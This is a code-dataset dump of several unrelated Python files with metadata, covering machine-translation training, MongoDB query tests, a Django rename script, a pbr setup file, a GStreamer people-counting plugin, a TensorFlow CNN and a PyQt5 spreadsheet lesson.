attention_type, dropout_rate = dropout_rate)\n else: \n encoder = Encoder(args, num_layers, vocab_size = srcLang.vocab_size, use_position_emb = False)\n decoder = DecoderRNN(emb_size, hidden_size, tgtLang.vocab_size, num_layers, rnn_type = rnn_type, dropout_rate = dropout_rate)\n\n \n encoder, decoder = encoder.to(device), decoder.to(device)\n print('Encoder:')\n print(encoder)\n print('Decoder:')\n print(decoder)\n trainIters(train_loader, val_loader, encoder, decoder, num_epochs, learning_rate, teacher_forcing_ratio, srcLang, tgtLang, model_save_info, tgt_max_len, beam_size)\n \n\nif __name__ == \"__main__\":\n transtype = ('vi', 'en')\n paras = dict( \n src_max_vocab_size = 26109, # 47127, #26109,\n tgt_max_vocab_size = 24418, #31553, #24418,\n tgt_max_len = 128,\n max_src_len_dataloader = 72, #67, #72, \n max_tgt_len_dataloader = 71, #72, #71, \n\n emb_size = 300,\n hidden_size = 300,\n num_layers = 2,\n num_direction = 1,\n deal_bi = 'linear', #{'linear', 'sum'}\n rnn_type = 'LSTM', # LSTM\n attention_type = 'concat', #'dot_prod', general, concat\n teacher_forcing_ratio = 1,\n\n learning_rate = 3e-4,\n num_epochs = 50,\n batch_size = 128, \n beam_size = 1,\n dropout_rate = 0.1,\n\n model_save_info = dict(\n model_path = 'nmt_models/vi-en-selfattention300-lrdecay_encoderlayer21_random_dr1_lige/',\n epochs_per_save_model = 2,\n model_path_for_resume = None #'nmt_models/epoch_0.pth'\n )\n )\n #print('paras: ', paras)\n start_train(transtype, paras)\n\n\n\n", "sub_path": "SelfAtten_Encoder_RNN_Decoder/SelfAtten_RNN_train.py", "file_name": "SelfAtten_RNN_train.py", "file_ext": "py", "file_size_in_byte": 16795, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.tensor", "line_number": 41, "usage_type": "call"}, {"api_name": "config.SOS_token", "line_number": 41, "usage_type": "name"}, {"api_name": "config.device", "line_number": 41, "usage_type": "name"}, {"api_name": "random.random", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 135, "usage_type": "call"}, {"api_name": "SelfAtten_RNN_config.args", "line_number": 135, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.LambdaLR", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.LambdaLR", "line_number": 143, "usage_type": "call"}, {"api_name": "time.time", "line_number": 147, "usage_type": "call"}, {"api_name": "selfatten_RNN_evaluation.evaluate_batch", "line_number": 173, "usage_type": "call"}, {"api_name": "time.time", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 230, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 235, "usage_type": "call"}, {"api_name": "preprocessing_util.preposs_toekn", "line_number": 241, "usage_type": "call"}, {"api_name": "preprocessing_util.preposs_toekn", "line_number": 246, "usage_type": "call"}, {"api_name": "preprocessing_util.preposs_toekn", "line_number": 251, "usage_type": "call"}, {"api_name": "preprocessing_util.preposs_toekn", "line_number": 256, "usage_type": "call"}, {"api_name": "preprocessing_util.construct_Lang", "line_number": 260, "usage_type": "call"}, {"api_name": "preprocessing_util.construct_Lang", "line_number": 261, "usage_type": "call"}, {"api_name": "preprocessing_util.text2index", "line_number": 262, "usage_type": "call"}, {"api_name": "preprocessing_util.text2index", "line_number": 263, "usage_type": "call"}, {"api_name": "preprocessing_util.text2index", "line_number": 264, "usage_type": "call"}, {"api_name": "preprocessing_util.text2index", "line_number": 265, "usage_type": "call"}, {"api_name": "Data_utils.VocabDataset", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 269, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 269, "usage_type": "attribute"}, {"api_name": "Data_utils.vocab_collate_func", "line_number": 271, "usage_type": "name"}, {"api_name": "Data_utils.VocabDataset", "line_number": 274, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 275, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 275, "usage_type": "attribute"}, {"api_name": "Data_utils.vocab_collate_func", "line_number": 277, "usage_type": "name"}, {"api_name": "config.device", "line_number": 286, "usage_type": "argument"}, {"api_name": "torch.from_numpy", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 286, "usage_type": "attribute"}, {"api_name": "config.device", "line_number": 287, "usage_type": "argument"}, {"api_name": "torch.from_numpy", "line_number": 287, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 287, "usage_type": "attribute"}, {"api_name": "selfAtten_RNN_Encoder.Encoder", "line_number": 290, "usage_type": "call"}, {"api_name": "SelfAtten_RNN_config.args", "line_number": 290, "usage_type": "argument"}, {"api_name": "Multilayers_Decoder.DecoderAtten", "line_number": 291, "usage_type": "call"}, {"api_name": "selfAtten_RNN_Encoder.Encoder", "line_number": 293, "usage_type": "call"}, {"api_name": "SelfAtten_RNN_config.args", "line_number": 293, "usage_type": "argument"}, {"api_name": "config.device", "line_number": 297, "usage_type": "argument"}]} +{"seq_id": "370860770", "text": "import mock\nimport pytest\n\nfrom bson.objectid import ObjectId\nfrom nbsearch.v1 import query\n\nfrom .utils import AsyncMock, AsyncIterator\n\n\n@pytest.mark.asyncio\nasync def test_mongo_query_from_q():\n nq = query.nq_from_q('QUERY')\n assert nq == {'target': {'text': 'QUERY', 'type': 'all'}}\n\n history = mock.Mock()\n notebooks = mock.Mock()\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$text': {'$search': 'QUERY'}}}]\n\n@pytest.mark.asyncio\nasync def test_mongo_query_from_meme():\n nq = query.nq_from_meme('MEME')\n assert nq == {'cell': {'and': [{'in_meme': 'MEME'}]}}\n\n history = mock.Mock()\n notebooks = mock.Mock()\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$and': [{'cells': {'$elemMatch': {'metadata.lc_cell_meme.current': {'$regex': '.*MEME.*'}}}}]}}]\n\n@pytest.mark.asyncio\nasync def test_mongo_query_from_invalid_nq():\n history = mock.Mock()\n notebooks = mock.Mock()\n\n with pytest.raises(KeyError):\n nq = {'cell': {'and': [{'not_valid': 'OUTPUT'}]}}\n await query.mongo_agg_query_from_nq(nq, history, notebooks)\n\n@pytest.mark.asyncio\nasync def test_mongo_cell_query_from_nq():\n history = mock.Mock()\n notebooks = mock.Mock()\n\n nq = {'cell': {'and': [{'in_code': 'CODE'}]}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$and': [{'cells': {'$elemMatch': {'cell_type': 'code', 'source': {'$regex': '.*CODE.*'}}}}]}}]\n\n nq = {'cell': {'and': [{'not_in_code': 'CODE'}]}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$and': [{'cells': {'$elemMatch': {'cell_type': 'code', 'source': {'$not': {'$regex': '.*CODE.*'}}}}}]}}]\n\n nq = {'cell': {'and': [{'not_in_code': 'CODE', 'in_output': 'OUTPUT'}]}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$and': [{'cells': {'$elemMatch': {'cell_type': 'code', 'source': {'$not': {'$regex': '.*CODE.*'}}, 'cell.outputs.text': {'$regex': '.*OUTPUT.*'}}}}]}}]\n\n nq = {'cell': {'and': [{'in_markdown': 'MARKDOWN'}]}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$and': [{'cells': {'$elemMatch': {'cell_type': 'markdown', 'source': {'$regex': '.*MARKDOWN.*'}}}}]}}]\n\n nq = {'cell': {'and': [{'in_output': 'OUTPUT'}]}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$and': [{'cells': {'$elemMatch': {'cell.outputs.text': {'$regex': '.*OUTPUT.*'}}}}]}}]\n\n@pytest.mark.asyncio\nasync def test_mongo_target_query_from_nq():\n history = mock.Mock()\n notebooks = mock.Mock()\n\n nq = {'target': {'text': 'TEXT', 'type': 'all'}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$text': {'$search': 'TEXT'}}}]\n\n history.find_one = AsyncMock()\n history.find_one.return_value = {'notebook_ids': ['0123456789abcdef01234567', '123456789abcdef012345670']}\n\n nq = {'target': {'history_in': 'abcdef012345670123456789'}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'_id': {'$in': [ObjectId('0123456789abcdef01234567'), ObjectId('123456789abcdef012345670')]}}}]\n\n notebooks.aggregate = mock.Mock()\n notebooks.aggregate.return_value = AsyncIterator([{'_id': 'MEME{0:04d}'.format(i)} for i in range(5)])\n\n nq = {'target': {'history_related': 'abcdef012345670123456789'}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n print(mongoq)\n assert mongoq == [{'$match': {'cells': {'$elemMatch': {'$or': [\n {'metadata.lc_cell_meme.current': {'$regex': '^MEME0000.*'}},\n {'metadata.lc_cell_meme.current': {'$regex': '^MEME0001.*'}},\n {'metadata.lc_cell_meme.current': {'$regex': '^MEME0002.*'}},\n {'metadata.lc_cell_meme.current': {'$regex': '^MEME0003.*'}},\n {'metadata.lc_cell_meme.current': {'$regex': '^MEME0004.*'}}\n ]}}}}]\n", "sub_path": "nbsearch/tests/test_query.py", "file_name": "test_query.py", "file_ext": "py", "file_size_in_byte": 4150, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "nbsearch.v1.query.nq_from_q", "line_number": 12, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 12, "usage_type": "name"}, {"api_name": "mock.Mock", "line_number": 15, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 16, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 17, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 17, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 10, "usage_type": "attribute"}, {"api_name": "nbsearch.v1.query.nq_from_meme", "line_number": 22, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 22, "usage_type": "name"}, {"api_name": "mock.Mock", "line_number": 25, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 26, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 27, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 27, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "mock.Mock", "line_number": 32, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 33, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 35, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 37, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 37, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 30, "usage_type": "attribute"}, {"api_name": "mock.Mock", "line_number": 41, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 42, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 45, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 45, "usage_type": "name"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 49, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 49, "usage_type": "name"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 53, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 53, "usage_type": "name"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 57, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 57, "usage_type": "name"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 61, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 61, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 39, "usage_type": "attribute"}, {"api_name": "mock.Mock", "line_number": 66, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 67, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 70, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 70, "usage_type": "name"}, {"api_name": "utils.AsyncMock", "line_number": 73, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 77, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 77, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 78, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 80, "usage_type": "call"}, {"api_name": "utils.AsyncIterator", "line_number": 81, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 84, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 84, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 64, "usage_type": "attribute"}]} +{"seq_id": "531132600", "text": "import sys\nimport re\nimport pathlib\nimport os\nimport fileinput\n\ndef _get_project_name():\n manage_file_path = os.path.join(pathlib.Path(__file__).parent.absolute(), 'manage.py')\n with open(manage_file_path) as file:\n for line in file.readlines():\n if 'DJANGO_SETTINGS_MODULE' in line:\n return line.split(\"', '\")[-1].split('.settings')[0]\n\ndef _search_and_replace(file, occurence, replace_by):\n with fileinput.FileInput(file, inplace=True) as file:\n for line in file:\n print(line.replace(occurence, replace_by), end='')\n\n\ndef rename_project(project_name: str):\n project_name = project_name.lower();\n if (not re.match(r\"^([a-z0-9_]{3,20}[^-])$\", project_name)):\n sys.exit('Could not change the name of the project.\\nThe project name must be lower cased and range from 3 to 20 characters!')\n \n old_project_name = _get_project_name()\n directory_path = pathlib.Path(__file__).parent.absolute()\n\n to_search = (\n (old_project_name, 'asgi.py'), \n (old_project_name, 'settings.py'),\n (old_project_name, 'wsgi.py'),\n (old_project_name, 'urls.py'),\n ('manage.py', ),\n )\n\n for path_sequence in to_search:\n _search_and_replace(os.path.join(directory_path, *path_sequence), old_project_name, project_name)\n \n os.rename(os.path.join(directory_path, old_project_name), os.path.join(directory_path, project_name))\n\n\n if (_get_project_name() == project_name):\n print(f\"The Django Project has been renamed to '{project_name}' successfully!\")\n else:\n print(f\"Something went wrong while renaming the project... The action could not be done!\")\n\n\nif __name__ == \"__main__\":\n args = sys.argv[1:]\n if len(args) == 0:\n project_name = input('Choose a name for the project:\\n The name should be lower cased alphanumerical value (underscore include) \\n with length ranging from 3 to 20.\\n:')\n else:\n project_name = args[0]\n rename_project(project_name)\n\n \n", "sub_path": "rename.py", "file_name": "rename.py", "file_ext": "py", "file_size_in_byte": 2022, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 8, "usage_type": "call"}, {"api_name": "fileinput.FileInput", "line_number": 15, "usage_type": "call"}, {"api_name": "re.match", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 23, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.rename", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}]} +{"seq_id": "524852495", "text": "import setuptools\n\n# A bit of pbr monkey-patching\n# We'd like to have a way to compose extras.\nimport pbr.util\norig_setup_cfg_to_setup_kwargs = pbr.util.setup_cfg_to_setup_kwargs\n\ndef lookup_extras(requirement, extras):\n if not requirement.startswith('['):\n return [requirement]\n extra = requirement.strip('[]')\n requirements = []\n for requirement in extras[extra]:\n requirements += lookup_extras(requirement, extras)\n return requirements\n\ndef setup_cfg_to_setup_kwargs(*args, **kwargs):\n kwargs = orig_setup_cfg_to_setup_kwargs(*args, **kwargs)\n extras = kwargs['extras_require']\n for extra, requirements in extras.items():\n new_requirements = []\n for requirement in requirements:\n new_requirements += lookup_extras(requirement, extras)\n extras[extra] = new_requirements\n return kwargs\n\npbr.util.setup_cfg_to_setup_kwargs = setup_cfg_to_setup_kwargs\n\n\nsetuptools.setup(\n setup_requires=['pbr'],\n pbr=True,\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 988, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pbr.util.util", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pbr.util", "line_number": 6, "usage_type": "name"}, {"api_name": "pbr.util.util", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pbr.util", "line_number": 27, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "444219492", "text": "import gi\n\ngi.require_version(\"GstBase\", \"1.0\")\n\nimport os\nimport cv2\nimport numpy as np\nimport msgpack\nimport struct\nfrom gi.repository import Gst, GObject, GstBase, GLib\nfrom typing import List\n\nGst.init(None)\n\nICAPS = Gst.Caps(\n Gst.Structure(\n \"application/msgpack-predicts\"\n )\n)\n\nOCAPS = Gst.Caps(\n Gst.Structure(\n \"application/meter\",\n )\n)\n\n\ndef read_mask():\n mask = cv2.imread(os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n \"..\",\n \"resource\",\n \"mask.bmp\",\n ))\n return mask\n\n\nclass PeopleCounter(GstBase.BaseTransform):\n __gstmetadata__ = (\"PeopleCounter\", \"Transform\", \"Counter\", \"UM\")\n\n __gsttemplates__ = (\n Gst.PadTemplate.new(\n \"src\", Gst.PadDirection.SRC, Gst.PadPresence.ALWAYS, OCAPS\n ),\n Gst.PadTemplate.new(\n \"sink\", Gst.PadDirection.SINK, Gst.PadPresence.ALWAYS, ICAPS\n ),\n )\n\n max_age = GObject.Property(\n type=int,\n nick=\"Max Age\",\n blurb=\"Amount of frames, infuencing on current count.\",\n minimum=0,\n maximum=100,\n default=1,\n flags=GObject.ParamFlags.READWRITE,\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.buffer: List[int] = []\n\n self.last_tracks: List[int] = []\n self.last_coords: List[List[float]] = []\n self.last_mean_count: int = None\n self.room_people_counter: int = 0\n self.original_mask = read_mask()\n self._mask = None\n\n def get_mask(self, shape):\n shape = tuple(shape)\n if self._mask is not None and self._mask.shape == shape:\n return self._mask\n mask = cv2.resize(self.original_mask, shape)\n self._mask = np.clip(mask[:, :, 2], 0, 1)\n return self._mask\n\n def do_transform_caps(self, direction, caps, filter_):\n # (Kostya): without this override the element negotiates\n # the same formats on both caps, which is not what we need here:\n # our `src` cap must return predicts instead of a video stream.\n #\n # Copied from: https://github.com/GStreamer/gst-python/blob/30cc0fc83de306626bfb30b679156be30fbf1be9/examples/plugins/python/audioplot.py#L164\n\n if direction == Gst.PadDirection.SRC:\n res = ICAPS\n else:\n res = OCAPS\n\n if filter_:\n res = res.intersect(filter_)\n return res\n\n def do_transform(self, inbuf, outbuf):\n magic_header = 0xfa91ffff\n\n is_success, info = inbuf.map(Gst.MapFlags.READ)\n assert is_success is True\n\n s = '!LL'\n magic, payload_length, = struct.unpack_from(s, info.data)\n struct_size = struct.calcsize(s)\n assert magic == magic_header, f\"unexpected payload! {magic:x}\"\n shape, _labels, _scores, _coords, _tracks = msgpack.unpackb(\n info.data[struct_size: payload_length + struct_size],\n raw=False\n )\n\n inbuf.unmap(info)\n\n self.buffer.append(len(_labels))\n self.buffer = self.buffer[-self.max_age:]\n\n mean_count = int(sum(self.buffer)/len(self.buffer))\n\n mask = self.get_mask(shape)\n\n # check new tracks\n appeared = 0\n left = 0\n\n for idx, track in enumerate(_tracks):\n if track not in self.last_tracks:\n coords = _coords[idx]\n center_x = int((coords[0] + coords[2]) / 2)\n center_y = int((coords[1] + coords[3]) / 2)\n if mask[center_y, center_x]:\n appeared += 1\n\n for idx, track in enumerate(self.last_tracks):\n if track not in _tracks:\n coords = self.last_coords[idx]\n center_x = int((coords[0] + coords[2]) / 2)\n center_y = int((coords[1] + coords[3]) / 2)\n if mask[center_y, center_x]:\n left += 1\n\n self.last_tracks = _tracks\n self.last_coords = _coords\n\n room_count = 0xffffffff\n if self.last_mean_count is not None:\n delta = self.last_mean_count - mean_count\n self.room_people_counter += delta - left + appeared\n self.room_people_counter = max(0, self.room_people_counter) # prevent subzero counts\n room_count = self.room_people_counter\n\n self.last_mean_count = mean_count\n\n meter_magic_header = 0xfa91f534\n full_data = struct.pack('!LLL', meter_magic_header, mean_count, room_count)\n\n assert len(full_data) <= outbuf.get_size(), (\n f\"Too much data {len(full_data)} for buffer {outbuf.get_size()}\"\n )\n\n outbuf.fill(0, full_data)\n\n return Gst.FlowReturn.OK\n\n\nGObject.type_register(PeopleCounter)\n__gstelementfactory__ = (\"people_counter_py\", Gst.Rank.NONE, PeopleCounter)\n", "sub_path": "detector_back/worker/detector/gstreamer/python/people_counter.py", "file_name": "people_counter.py", "file_ext": "py", "file_size_in_byte": 4834, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "gi.require_version", "line_number": 3, "usage_type": "call"}, {"api_name": "gi.repository.Gst.init", "line_number": 13, "usage_type": "call"}, {"api_name": "gi.repository.Gst", "line_number": 13, "usage_type": "name"}, {"api_name": "gi.repository.Gst.Caps", "line_number": 15, "usage_type": "call"}, {"api_name": "gi.repository.Gst", "line_number": 15, "usage_type": "name"}, {"api_name": "gi.repository.Gst.Structure", "line_number": 16, "usage_type": "call"}, {"api_name": "gi.repository.Gst", "line_number": 16, "usage_type": "name"}, {"api_name": "gi.repository.Gst.Caps", "line_number": 21, "usage_type": "call"}, {"api_name": "gi.repository.Gst", "line_number": 21, "usage_type": "name"}, {"api_name": "gi.repository.Gst.Structure", "line_number": 22, "usage_type": "call"}, {"api_name": "gi.repository.Gst", "line_number": 22, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 30, "usage_type": "call"}, {"api_name": "gi.repository.GstBase.BaseTransform", "line_number": 38, "usage_type": "attribute"}, {"api_name": "gi.repository.GstBase", "line_number": 38, "usage_type": "name"}, {"api_name": "gi.repository.Gst.PadTemplate.new", "line_number": 42, "usage_type": "call"}, {"api_name": "gi.repository.Gst.PadTemplate", "line_number": 42, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 42, "usage_type": "name"}, {"api_name": "gi.repository.Gst.PadDirection", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 43, "usage_type": "name"}, {"api_name": "gi.repository.Gst.PadPresence", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst.PadTemplate.new", "line_number": 45, "usage_type": "call"}, {"api_name": "gi.repository.Gst.PadTemplate", "line_number": 45, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 45, "usage_type": "name"}, {"api_name": "gi.repository.Gst.PadDirection", "line_number": 46, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 46, "usage_type": "name"}, {"api_name": "gi.repository.Gst.PadPresence", "line_number": 46, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject.Property", "line_number": 50, "usage_type": "call"}, {"api_name": "gi.repository.GObject", "line_number": 50, "usage_type": "name"}, {"api_name": "gi.repository.GObject.ParamFlags", "line_number": 57, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 62, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 65, "usage_type": "name"}, {"api_name": "cv2.resize", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 76, "usage_type": "call"}, {"api_name": "gi.repository.Gst.PadDirection", "line_number": 86, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 86, "usage_type": "name"}, {"api_name": "gi.repository.Gst.MapFlags", "line_number": 98, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 98, "usage_type": "name"}, {"api_name": "struct.unpack_from", "line_number": 102, "usage_type": "call"}, {"api_name": "struct.calcsize", "line_number": 103, "usage_type": "call"}, {"api_name": "msgpack.unpackb", "line_number": 105, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 152, "usage_type": "call"}, {"api_name": "gi.repository.Gst.FlowReturn", "line_number": 160, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 160, "usage_type": "name"}, {"api_name": "gi.repository.GObject.type_register", "line_number": 163, "usage_type": "call"}, {"api_name": "gi.repository.GObject", "line_number": 163, "usage_type": "name"}, {"api_name": "gi.repository.Gst.Rank", "line_number": 164, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 164, "usage_type": "name"}]} +{"seq_id": "513124511", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 22 10:59:07 2018\n\n@author: 354651\n\"\"\"\n\nimport tensorflow as tf\nfrom model import model\nimport dataset\n\n\ndef main():\n with tf.Session() as sess:\n \n m = model(sess)\n \n sess.run(tf.global_variables_initializer())\n \n for epoch in range(10):\n total_cost = 0\n \n for step in range(dataset.total_batch):\n x_data, y_data = dataset.train_data()\n c, _ = m.train(x_data, y_data)\n total_cost += c\n \n print(\"{} cost: {}\".format(epoch + 1, total_cost / dataset.total_batch))\n \n x_data, y_data = dataset.test_data()\n print(\"accuracy: {}\".format(m.accuracy(x_data, y_data)))\n \n \nif __name__ == '__main__':\n main()", "sub_path": "CNN/CNN.py", "file_name": "CNN.py", "file_ext": "py", "file_size_in_byte": 830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tensorflow.Session", "line_number": 14, "usage_type": "call"}, {"api_name": "model.model", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 18, "usage_type": "call"}, {"api_name": "dataset.total_batch", "line_number": 23, "usage_type": "attribute"}, {"api_name": "dataset.train_data", "line_number": 24, "usage_type": "call"}, {"api_name": "dataset.total_batch", "line_number": 28, "usage_type": "attribute"}, {"api_name": "dataset.test_data", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "235708320", "text": "import sys\nfrom PyQt5.QtWidgets import QTableWidget, QApplication, QMainWindow\nfrom PyQt5.QtWidgets import QTableWidgetItem\n\n'''\nLesson 17 (2/4)\nQTableWidget\nSpreadsheet Project\n'''\n\nclass MyTable(QTableWidget):\n\n def __init__(self, rows, columns):\n super(MyTable, self).__init__(rows, columns)\n\n self.init_ui()\n\n def init_ui(self):\n self.cellChanged.connect(self.c_current)\n\n self.show()\n\n def c_current(self):\n row = self.currentRow() # current row of the table instance\n col = self.currentColumn()\n value = self.item(row, col)\n value = value.text()\n print('The current cell is ', row, ', ', col)\n print('In this cell we have: ', value)\n\nclass Sheet(QMainWindow):\n #form_widget = MyTable(10, 10)\n\n def __init__(self):\n super(Sheet, self).__init__()\n\n form_widget = MyTable(10,10) # used self in the original tuts\n\n self.setCentralWidget(form_widget)\n col_headers = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J']\n form_widget.setHorizontalHeaderLabels(col_headers)\n\n number = QTableWidgetItem('10') # special item for QTableWidget\n form_widget.setCurrentCell(1, 1)\n # if this line form_widget.setCurrentCell(1, 1) is not specified\n # no value will be passed to c_current\n\n form_widget.setItem(1, 1, number)\n # because val in this cell is changed, it calls c_current\n\n self.show()\n\n\napp = QApplication([])\nsheet = Sheet()\nsys.exit(app.exec_())", "sub_path": "lesson17_tablep2.py", "file_name": "lesson17_tablep2.py", "file_ext": "py", "file_size_in_byte": 1534, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 11, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 31, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 43, "usage_type": "call"}, {"api_name": 